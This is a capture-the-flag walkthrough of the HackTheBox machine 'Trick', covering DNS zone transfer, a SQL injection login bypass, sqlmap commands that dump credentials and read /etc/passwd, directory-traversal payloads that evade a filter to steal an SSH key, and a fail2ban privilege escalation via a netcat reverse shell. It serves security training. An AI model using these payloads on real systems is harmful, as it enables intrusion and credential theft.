Trick – HackTheBox Writeup

Machine Name: Trick
IP: 10.10.11.166
Difficulty: Easy

Summary

Trick is a moderately easy machine that demands a lot of enumeration skills. It involves finding two sub-domains that can be found through DNS zone transfer and sub-domain fuzzing. One of the sub-domains has a SQLi that can be leveraged to gather information on the server and the other sub-domain has a LFI that exposes SSH private key. This key is used to gain SSH access to the user. Since the user can restart fail2ban as root, one of fail2ban’s configuration files needed to be modified to gain a reverse shell as root.

Information Gathering

Nmap scan shows that SSH, SMTP, DNS, and port 80 running NGINX v1.14.2 are open. I also added “trick.htb” to the hosts file.

nmap -sC -sV -oN trick 10.10.11.166

First, I looked at the web server on port 80 and found only dead links.

Next, I ran gobuster and found nothing useful. Then, I enumerated the SMTP on open port of 25.

Using telnet, I could do some banner grabbing and user enumeration. A simple way is to check for the user root. We get code 252 for a valid user (root), and 550 for a non-existent user (sid).

Ofcourse, manually enumerating users is not viable. I used metasploit’s auxiliary scanner, “smtp_enum” to enumerate the users.

msfconsole
use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.11.166
RHOSTS => 10.10.11.166
msf6 auxiliary(scanner/smtp/smtp_enum) > run

Although I found some valid users, I didn’t know where to use them. I proceeded to enumerate DNS on port 53.

Let’s use the tool “dig” to get “any” information from the DNS records.

dig ANY trick.htb @10.10.11.166

We find another sub-domain named “root.trick.htb”. Let’s add that to the hosts file. It redirects us to the same page as “trick.htb”. Next, I tried a zone transfer.

dig axfr trick.htb @10.10.11.166

Another sub-domain named “preprod-payroll.trick.htb” is found. After adding that to the hosts file, I visited the site and found a login page.

Default credentials such as “admin:admin” do not work. Login pages without context only point us towards SQLi. The payload below worked and logged me in.

#SQLi payload
Username: ' OR 1 -- -

I also used “SQLmap” to discover other SQL injections and use them to gather more information.

sqlmap -r login.req --level 5 --risk 3 --batch

I tried to find the databases, users, files.

sqlmap -r login.req --level 5 --risk 3 --batch --dbs

sqlmap -r login.req --level 5 --risk 3 --batch --users

sqlmap -r login.req --level 5 --risk 3 --batch --file-read=/etc/passwd

Two new users named “michael”, and “remo” are found.

Let’s also look at the database, “payroll_db”.

sqlmap -r login.req --level 5 --risk 3 --batch -D payroll_db -T users --columns

Let’s grab all those columns as well.

sqlmap -r login.req --level 5 --risk 3 --batch -D payroll_db -T users -C id,name,password,username --dump

We have credentials for an Administrator with the username “Enemigosss” and password “SuperGucciRainbowCake”.

If we look at the Users’ tab in the “preprod-payroll.trick.htb” page, we can obtain the same credentials by inspecting the password field.

Another potential username was found in the Employee List tab.

We gathered a lot of usernames but only one password. Let’s try to login with these credentials we have obtained.

crackmapexec ssh trick.htb -u users.txt -p pass.txt

None of the credentials worked.

I was stuck here until I tried to discover subdomains.

Gaining User Shell

wfuzz -H 'Host: preprod-FUZZ.trick.htb' -u 10.10.11.166 -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hw 475

The site’s pages are retrieved using the “GET” method that takes arguments in the URL. Looking at that is a hint for LFI.

Simply traversing through directories for an LFI returns nothing. Seems like it is filtering something or has a blocking mechanism in place. A few attempts later, I found that it was filtering the “../” characters and the payload “….//” bypasses this filter.

page=../../../../../../etc/passwd #Does not work

page=....//....//....//....//....//etc/passwd #Works

page=..././..././..././..././etc/passwd #Works

Great! Let’s see if we can get the SSH private key. I was able to retrieve the private key of the user “michael”.

I copied this key to a file and modified the permissions of the file to login through SSH.

Got the user flag!

To confirm what kind of filter was being used, I looked at the source code.

It was indeed filtering the “../” by string replacing it.

Privilege Escalation

First thing I always do is “sudo -l”.

The user can run fail2ban as root. Looking at the configuration files of fail2ban, it can be observed that the “security” group users have write access to the action directory. Michael belongs to the security group! Let’s try to modify the “action.d” file.

In the “jail.conf” file, the ban is defined for 10 seconds if a host tries to login more than 5 times.

Every time a user is banned, the ban action is defined in the “action.d/ip-tables-multiport.conf”. Although we can move this file, we cannot write into this file. The key is to get fail2ban to execute our malicious command through “actionban”.

First, I copied the file to the tmp directory so that I can edit it and add a netcat reverse shell payload to the actionban line. Then, I removed the original file and copied the file to the “/etc/fail2ban/action.d/iptables-multiport.conf” location.

Now that we have the payload in place, it needs to be triggered by logging in multiple times (more than 5) through SSH to get the actionban to return a reverse shell. Before that, I started a netcat listener and then ran the fail2ban restart command. Finally, brute-force using hydra or attempt SSH login for more than 5 times to get a shell.

Pwned!

Got root!